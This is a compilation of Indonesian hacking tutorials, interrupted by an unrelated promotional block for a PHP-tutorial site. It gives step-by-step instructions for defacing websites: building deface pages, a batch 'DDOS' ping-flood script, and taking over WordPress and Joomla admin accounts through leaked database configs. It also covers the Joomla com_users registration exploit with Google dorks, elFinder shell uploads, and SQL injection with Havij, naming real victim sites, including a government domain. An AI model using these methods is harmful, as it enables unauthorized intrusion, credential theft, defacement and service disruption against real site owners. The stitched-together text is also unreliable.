Cara membuat Script Deface Bagi Pemula

Kali ini saya akan share tutorial yang mungkin "tidak diperlukan" lagi oleh para master deface. Namun meski tidak mainstream masih ada yang bertanya cara membuat Script HTML/ Script Deface. Oleh karena itu saya mencoba berbagi apa yang saya ketahui, membuat basic script HTML secara manual. Yang saya gunakan disini hanyalah Notepad.

Oke, sebelumnya perlu diketahui bahwa script HTML terdiri dari HEAD dan BODY. Head untuk menaruh judul dan meta tag sementara body diisi dengan notice/gambar deface.
Kira-kira susunannya seperti ini :
<HTML>
<head>
[kode HTML]
</head>
<body>
[Kode HTML]
</body>
</HTML>

Kita coba membuat title/judul halaman deface dan isi.
Perhatikan saja script sederhana berikut.
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body>
Just simple script by nabilaholic
</body>
</HTML>

Simpan dengan format .html . Sebagai contoh saya simpan dengan nama hacked.html . Coba buka menggunakan firefox/chrome sobat.

Sip, langkah awal sudah berhasil.
Tahap kedua, kita coba untuk mengatur warna, besar huruf dan menengahkan huruf.
Simak saja scriptnya :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body>
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
</body>
</HTML>

Untuk font color bisa diganti dengan green, blue dll. Begitu juga dengan font size. Ini hasilnya :

Tahap ketiga, kita coba memberi warna background pada script HTML.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
</body>
</HTML>
Tinggal menambahkan BGCOLOR di samping kode <body dan sebelum tanda tutp [>]
Save dan lihat hasilnya.

Tahap membuat script HTML bagi pemula sudah hampir selesai. Sekarang kita coba untuk menambah gambar pada script HTML kita.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjyZPxLEosuUJo3Ns3ubFrdA85YT5M0VSzMxCjO-itHsq9jM2LskFcZ_1OsgcQMm2uGFVWlHwjvybMZsMh5memzrHOlIzFlPHw2b1E3iXZdK7tH93yyq1NfqopHGfgn8mUOqFQw5izCZe_/s1600/heavyrotation.jpg" width="860" height="264""><center>
</body>
</HTML>

URL gambar yang saya beri warna biru bisa kalian ganti sendiri. Begitu juga dengan width dan height. Untuk gambarnya bisa cari di google atau upload di hosting upload gambar . Ex : google picasa, photobucket, dll.

Sekarang,kita coba tambahkan meta tag di komponen HEAD. Apa sih fungsi meta tag ?
Untuk member description dan keyword di hasil pencarian google. Mungkin kalau dijelaskan dengan kata-kata sulit, coba lihat saja gambar berikut.

Kata yang saya beri tanda merah, itulah yang disebut META DESCRIPTION.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
<meta name="description" content="You Got Hacked by Nabilaholic ? Where the security !" />
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjyZPxLEosuUJo3Ns3ubFrdA85YT5M0VSzMxCjO-itHsq9jM2LskFcZ_1OsgcQMm2uGFVWlHwjvybMZsMh5memzrHOlIzFlPHw2b1E3iXZdK7tH93yyq1NfqopHGfgn8mUOqFQw5izCZe_/s1600/heavyrotation.jpg" width="860" height="264""><center>
</body>
</HTML>

Sebenarnya masih banyak meta tag seperti meta keyword, robots, title , dll. Namun karena ini adalah tahap perkenalan, pasang yang penting saja dulu. Yaitu meta description.

Selanjutnya, kita coba sedikit menghias script kita dengan tulisan berjalan [marquee] dan berkedip [blink].
Lihat saja kode berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
<meta name="description" content="You Got Hacked by Nabilaholic ? Where the security !" />
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6><blink>Just simple script by nabilaholic</blink></FONT></FONT></center>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjyZPxLEosuUJo3Ns3ubFrdA85YT5M0VSzMxCjO-itHsq9jM2LskFcZ_1OsgcQMm2uGFVWlHwjvybMZsMh5memzrHOlIzFlPHw2b1E3iXZdK7tH93yyq1NfqopHGfgn8mUOqFQw5izCZe_/s1600/heavyrotation.jpg" width="860" height="264""><center>
<center><FONT COLOR="red"><FONT SIZE=6><marquee>Just simple script by nabilaholic</marquee></FONT></FONT></center>
</body>
</HTML>


Berikut contoh hasil deface an saya ,maaf saya juga baru belajar untuk mendeface jadi harap maklum :D http://ableprintingco.com/upload/files/defaceby70attacker.html

Belajar PHP,Cara Membuat Website,Belajar HTML,MySQL khusus pemula, mudah & lengkap

Belajar PHP, cara membuat Website, belajar HTML, belajar MySQL, membuat PHP & belajar komputer khusus untuk pemula, gratis, mudah & lengkap.
Nama saya Prothelord, dan siap untuk menjadi partner anda untuk belajar PHP, cara membuat website, Belajar MySQL, Belajar HTML, Belajar Komputer, Web Desain dan bahasa secara online. Total sudah tersedia > 300 TUTORIAL lho, jadi jangan sia-siakan dan segeralah mulai belajar biar cepet bisa.
Di sini tersedia berbagai macam tutorial yang akan membantu Anda mempelajari berbagai teknik cara membuat website. Jika Anda seorang pemula alias newbie, saya sarankan mulai dengan klik dari beberapa kategori dasar ini :

• Tutorial belajar cara membuat website (baca ini dulu terutama untuk pemula)
• Tutorial belajar HTML tingkat dasar (untuk pemula)
• Tutorial belajar PHP tingkat dasar (untuk pemula)
• Tutorial belajar MySQL tingkat dasar (untuk pemula)
• Tutorial belajar komputer

(Silakan klik tutorial menu sebelah kiri untuk level menengah dan advance)
Oh ya, kalau kamu suka dengan prothelon.com dan berminat untuk memberikan kontribusi buat prothelon.com serta bantuin orang lain belajar, silakan lakukan salah satu hal berikut:

• Pasang link ke prothelon.com: Buat link dengan judul “Belajar PHP, HTML, MySQL, cara membuat website, VB, Komputer dan Bahasa” biar makin banyak orang yang bisa belajar dari situs ini melalui web site atau blog kamu. Ndak punya web site/blog? Gunakan milis atau e-mail. Gampang kan? Copy paste aja kode ini ke web site, blog atau email kamu:
  <a href=’http://prothelon.com’>Belajar PHP, cara membuat website, Belajar HTML, Belajar MySQL, VB, Komputer dan Bahasa</a>, atau
• mengikuti kursus online 4 langkah mudah belajar membuat website ini, atau
• Membeli buku-buku saya Cara Mudah Membuat Desain Web ini dan Tip & Trik Menjadi Master PHP, atau
• Paling GUAMPIIING … dengan klik “Follow” untuk mengikuti kuliah twitter saya atau mengklik “suka” di facebook sebelah kiri. Jangan lupa share tulisan di sini ke temen-teman kamu di FB, twitter, dll ya, biar banyak yang mendapat manfaatnya.

Ingin memperoleh update artikel / tutorial terbaru? Gampang, kamu tinggal klik tombol Follow berikut ini, untuk mendapatkan info tutorial baru melalui twitter dan mengikuti kuliah twitter gratis dari saya tentang cara membuat website, SEO, dll.

Bagi yang ingin menyumbang tulisan plz welcome.
Situs ini di update hampir setiap hari, silahkan kembali lagi untuk melihat artikel baru.
Tutorial di prothelon.com memang cukup lengkap, tetapi ada satu kelemahannya, kamu gak bisa langsung praktekin secara online. Nah kalau kamu gak puas cuman baca-baca tutorial doang, Saya sarankan coba belajar PHP, HTML dan MySQL sambil praktek biar lebih paham. Coba deh klik di sini.
Kalau kamu pengen memiliki tutorial di prothelon dalam bentuk buku plus berbagai materi tambahan lain yang jauh lebih menarik, bisa diperoleh di buku saya yang terbaru “Buku Pintar Pemrograman Web”.
Klik di sini untuk membaca detil buku tersebut.
Berikut ini testimoni salah satu pembelinya melalui twitter:

“@prothelord bagus bukunya, cocok banget buat saya yg bukan orang IT. 70rb rasanya terlalu murah utk buku sebagus ini.”

Berikut kesan dari pengunjung kami

Pertama tama waktu saya googling mengenai script php terus masuk ke Prothelon saya sebenarnya kaget dengan situs ini, kok ada ya orang yang mau membagi ilmu dengan begitu baik dan jujur, sebab kebanyakan orang2 yang punya ilmu IT itu sangat Sukar memberikan ilmu sedemikian gambalang (sangat sistematis, dari dasar banget).
Hanna

” ternyata saya temukan tutorial yang saya cari, mudah dimengerti dan runtut penyajiannya”
Salah seorang pengunjung

“Sungguh hebat, sebuah kreatifitas yang sangat bermakna … Aku salut buat prothelon.com … jangan berhenti sampai disini …”
A. Bastian

“Trims atas tutorialnya, sederhana dan sangat mudah di pahami bagi pemula spt saya yang memang sangat pemulaaaa…Moga2 aja di tambah lagi tutorialnya..”
spink

ari: wah bro, baru pertama baca ak langsung nyantol nih.. up2 update terus bro
ADAM13: sip bos cara jelasin bukutamunya bagus tuh.. Salam Web Developer

Tentang Penulis: Adhi Prasetio mulai menggeluti pembuatan website sejak tahun 2001. Di samping kesibukannya sebagai pengajar dan pembicara dengan topik e-commerce, penulis juga telah bertahun-tahun aktif menulis di internet. Sebagian besar tulisannya ditujukan untuk berbagi pengalaman dan membantu para pemula dalam mempelajari cara membuat website dan internet marketing.
Penulis yang juga dikenal sebagai Prothelord, merupakan pengelola sekaligus kontributor utama website http://prothelon.com yang merupakan salah satu website populer untuk belajar membuat website. Buku yang sudah diterbitkan antara lain Cara Mudah Membuat Desain web untuk Pemula, Tip & Trik Menjadi Master PHP, Buku Pintar Pemrograman Web dan Smart Guide Jualan Online.
Anda bisa melihat profilnya di Google+

Cara Membuat Ddos Sendiri Mengunakan Notepad

1.Copy Tulisan Ini
@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo +++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server    +
echo + Author : XCode-404              +
echo + Visit : www.Xcode-404Uci.blogspot.com  +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

2.setelah di copy buka Notepad dan Salin Ke Notepad  Dan Simpan Dengan Nama DDOS.bat Dan Ubah Ke all files

Cara Deface Website Mengunakan Config

Selamat malam sobat  :D langsung aja sekarang mau kasih cara deface dengan config :D

Bahan - Bahan :

1. MySQL Interface | Download

2. Web Config

3. Video Tutorial | Download

Disini saya tidak akan membahas bagai mana mencari config dalam web, sobat bisa lihat di artikel Cara Mencari Config Dalam Website :)

Pertama silahkan sobat buka Link yang berisikan config :)

Config CMS Wordpress

Pilih salah satu config database CMS Worpress 

Masukkan Username Dan Passwordnya  ke My SQL Interface Lalu Login  :)

Kemudian Pilih kolom ke 2 lalu klik Tables

Setelah itu pada kolom wp_users  klik Data

Disini kita akan mengubah passwordnya, Klik Edit

Lalu ubah passwordnya dengan password kamu, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password disini

Lalu klik Edit Data untuk menyimpan perubahan. dan Silahkan sobat Loggin ke halaman login website :) kalo di CMS wordpress halaman loginnya berada:

http://sitetarget.com/wp-login.php

http://sitetarget.com/path/wp-login.php

Selanjutnya tinggal Tanem Shell di web tersebut, sobat bisa lihat Disini

Config CMS Joomla

Pilih salah satu config CMS Joomla :)

Masukkan Username Dan Passwordnya  ke My SQL Interface Lalu Login  :)

Kemudian Pilih kolom ke 2 lalu klik Tables

Setelah itu pada kolom jos_users  klik Data

Disini kita akan mengubah passwordnya, Klik Edit

Lalu ubah passwordnya dengan password yg sobat inginkan, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password disini

Lalu klik Edit Data untuk menyimpan perubahan. dan Silahkan sobat Loggin ke halaman login website :) kalo di CMS Joomla halaman loginnya berada:

http://sitetarget.com/administrator

http://sitetarget.com/path/administrator

Selanjutnya tinggal Tanem Shell di web tersebut, sobat bisa lihat Disini

Selamat Mencoba, :) Semoga Bermanfaat :)

Cara Deface Website Mengunakan Com

Com_User adalah Teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di seluruh indonesia. Com_User / Teknik Exploit joomla ini bisa di gunakan untuk web yang menggunakan joomla versi 1.6/ 1.7.3/ 2.5.

Bahan-Bahan
1. Exploit Joomla (download disini)

Langkah-Langkah
1. Cari web target di google dengan google dork ini.

Baca Juga: Google Dork Com_User

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it
(atau)
intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
(atau)
intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

Penjelasan:
*site: boleh diganti dengan com/ ca/ it/ za/ id/ ru dll (terserah anda)

intitle berarti, kata yang terkandung dalam judul sebuah Web.
intext berarti, kata yang terkandung didalam web tersebut.
site berarti, domain yang digunakan oleh web tersebut. ca=Canada ru=Russia dan sebagainya.

*Google Dork kembangin sendiri agar mendapat hasil yang lebih maksimal.

2. Open link in new tab, semua web yang muncul di hasil pencarian google. karena tidak semua web bisa.
3. Cari web yang vuln.

Gambar diatas merupakan site Vuln.

Gambar diatas merupakan site "Joomla yang samar-samar".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomlanya."

*Web yang saya namakan "samar-samar" itu bukan berarti sitenya tidak tidak bisa di deface/ tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 5% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

*Pastikan Web yang anda ingin deface adalah web yang vuln. karena web yang vuln 60% nya bisa di deface.

4. Setelah menemukan site yang vuln. masukkan exploit berikut di belakang sitenya

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://www.ssjuvestabia.it. maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://www.ssjuvestabia.it/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.

6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.

7. Cari kode hidden (dengan ctrl+f )dan cari kode seperti gambar di bawah ini. 

8. Copy code yang di beri kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut contoh: http://www.ssjuvestabia.it/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa ganti alamat email dan username nya (terserah kamu )

*Password dibiarkan berbeda

10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.

13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.

*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://www.ssjuvestabia.it/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://www.ssjuvestabia.it/administrator/

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

Cara tebas Index di web Joomla

Cara memasang shell di web Joomla

*Ada 4 kemungkinan GAGAL untuk web yang menggunakan CMS Joomla:

1. Web telah menghapus laman Registration Form.

2. Alamat Activation Link tidak masuk kedalam email.
3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.

4. Template tidak bisa di di ubah.

Paling sering GAGAL pada nomor 2

Cara Deface Webite Mengunakan elFinder

Assalamualaikum Wr.wb , Bertemu bersama saya lagi ya, hehehe kembali bersama artikel exploit saya, ya saya sih cuma iseng aja untuk mengisi waktu luang, berhubung sudah lama gak posting? Nih nikmatin yang terbaru dari saya hahaha :D

DORK: inurl:/elfinder/ intitle:index of (kembangin lagi)
POC: http://localhost/Patch/elfinder/elfinder.php.html or elfinder.php
PREVIEW: Klik dua kali file yang kita upload

Nih preview gambar elFinder nya:

Buat kalian yang mau mempelajarinya? Saya kasih live demo nya deh biar makin paham hehehe.
Nih dia life demonya:
http://www.avalon.ua/mcstudio/admin_stuff/js/elfinder/elfinder.php
Hasilnya :
http://www.avalon.ua/upload/usr/Asoy.txt
Ok, materi yang saya kasih gak pernah susah, saya kasih selalu yang mudah agar mudah dipahami.
Sekian dulu ya, Wassalamualaikum Wr.wb - See more at: http://predator-technology.blogspot.com/2013/06/elfinder-shell-upload-vulnerability.html#sthash.9a6lSco4.dpuf

Cara Deface Website Dengan Menggunakan Havij 1.15

Cara Deface Website Dengan Menggunakan Tools Havij 1.15
Download Tools :


Havij Version 1.15 Free | 2.75 MB
Password : Installation Setup

Download Tools Havijnya dari Mediafire
Lalu Extract Filenya
Kemudian Double Klik Icon Havijnya
Selesai.
1). Kalo Tools Havijnya sudah terinstal, buka tools tersebut dengan cara double click.

2). Nah, sekarang kita cari targetnya. Karena saya belum sempat share Dorknya, Jadi sobat bisa cari Dorknya di Google, Banyak kok :D


3). Jika target sudah dapat, saya ambil contoh http://www.dephut.go.id/index.php?q=hotspot&hid=2054


4). Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.

5). Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.

6). Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yang terletak disebelah Get Tables yang saya tandai degan No 2.

7). Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai dengan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.

8). Ayeee, keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.

9). Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE.


Nah bagaimana sob? lebih mudah atau lebih sulit dengan cara yang pernah saya post sebelumnya, kalo menurut saya cara ini adalah cara terpraktis, termurah dan paling gampang kalo kita mau meretas sebuah website.